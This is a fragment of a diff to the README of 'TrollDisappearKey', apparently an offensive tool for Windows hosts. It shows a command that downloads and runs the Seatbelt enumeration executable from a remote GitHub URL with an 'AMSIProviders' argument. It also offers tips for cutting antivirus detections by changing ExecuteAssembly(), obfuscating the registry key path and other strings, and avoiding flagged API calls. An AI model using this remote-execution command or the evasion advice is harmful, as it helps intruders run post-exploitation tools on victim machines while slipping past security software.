cybersectroll/TrollDisappearKey/README.md

 TrollDisappearKey.exe "https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.7_x64/Seatbelt.exe" "AMSIProviders"
 ```
 ## Detections
-Not too bad since zero effort to evade detection, there's tons of things to improve but i shall leave it to the reader \
-you can immediately drop it to maybe 5 by altering the ExecuteAssembly() function since its using standard code that's deemed malicious \
+Not too bad since zero effort to evade detection, there's tons of things to improve but i shall leave it to the reader.
+You can immediately drop it to maybe 5 by altering the ExecuteAssembly() function since its using standard code that's deemed malicious.
 Can rename/obufscate certain strings like the reg key path and void the use of certain API calls and improve the hook library further \
 ![Image](https://github.com/user-attachments/assets/e4c80f07-ddbc-4ed6-9ad0-c8e104931f90)